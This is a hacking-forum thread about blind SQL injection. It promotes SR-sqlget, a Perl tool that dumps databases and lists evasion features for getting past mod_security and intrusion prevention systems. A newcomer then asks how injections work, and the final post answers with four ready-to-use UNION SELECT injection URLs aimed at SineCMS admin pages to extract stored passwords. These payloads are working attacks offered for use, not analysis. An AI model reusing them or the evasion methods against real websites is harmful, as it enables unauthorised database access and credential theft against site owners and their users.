Jump to content

Recommended Posts

Posted

Blind SQL injection is identical to normal SQL Injection except that when an attacker attempts to exploit an application rather then getting a useful error message they get a generic page specified by the developer instead. This makes exploiting a potential SQL Injection attack more difficult but not impossible. An attacker can still steal data by asking a series of True and False questions through sql statements.

 

 

Information provided by Infobyte

 

 

SR-sqlget: It's a blind SQL injection tool developed in Perl. It lets you get databases schemas and tables rows. Using a single GET/POST you can access quietly the database structure and using a single GET/POST you can dump every table row to a csv-like file.

 

Databases supported:

- IBM DB2

- Microsoft SQL Server

- Oracle

- Postgres

- Mysql

- IBM Informix

- Sybase

- Hsqldb (www.hsqldb.org)

- Mimer (www.mimer.com)

- Pervasive (www.pervasive.com)

- Virtuoso (virtuoso.openlinksw.com)

- SQLite

- Interbase/Yaffil/Firebird (Borland)

- H2 (http://www.h2database.com)

- Mckoi (http://mckoi.com/database/)

- Ingres (http://www.ingres.com)

- MonetDB (http://www.monetdb.nl)

- MaxDB (www.mysql.com/products/maxdb/)

- ThinkSQL (http://www.thinksql.co.uk/)

- SQLBase (http://www.unify.com)

 

Evasion features:

- Full-width/Half-width Unicode encoding

- Apache non standard CR bypass

- mod_security bypass

- Random uppercase request transform

- PHP Magicquotes: encode every string using db CHR function or similar.

- Convert requests to hexadecimal values

- Avoid non-space replacing for /**/ or (\t) tab

- Avoid non || or + concatenation using db concat function or similar.

- Random user-agent

- Random proxy-server

- Random delay request

 

Common features:

- Database schemate download blacklist

- Cookie array support

- SSL support

- Proxy server support

- Database information dumped in csv format

 

Reporting:

- Database structure graphication to create impact executive reports require Graphviz library (http://www.graphviz.org/)

 

Demo:

- Demo features (bypassing IBM ISS Proventia IPS) - http://www.infobyte.com.ar/demo/ISR_sqlget_ISS_proventia_bypass.html

 

 

  • 3 weeks later...
  • 3 weeks later...
  • 3 months later...
Posted

Hmm sorry for posting in quite old post...But i think its the apropriate place to ask this:

I dont know nothing about mysql injections, so, i want to know how its done...How can i Insert or Read data from a database with an injection...Info plix, thnx:D

  • 3 weeks later...
Posted

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Guestbook&action=modifica&id='+union+select+1,2,3,4,password,

6+from+sine_configuration/*

 

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&mese=11'+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

 

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&action=modify&id='+union+select+1,2,3,4,password,6,7,8,9

+from+sine_configuration/*

 

http://[target]/[sinecms_path]/admin/mods_adm.php?

mods=Calendar&anno='+union+select+1,password,3,4,5,6,7,8,9

+from+sine_configuration/*

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

×
×
  • Create New...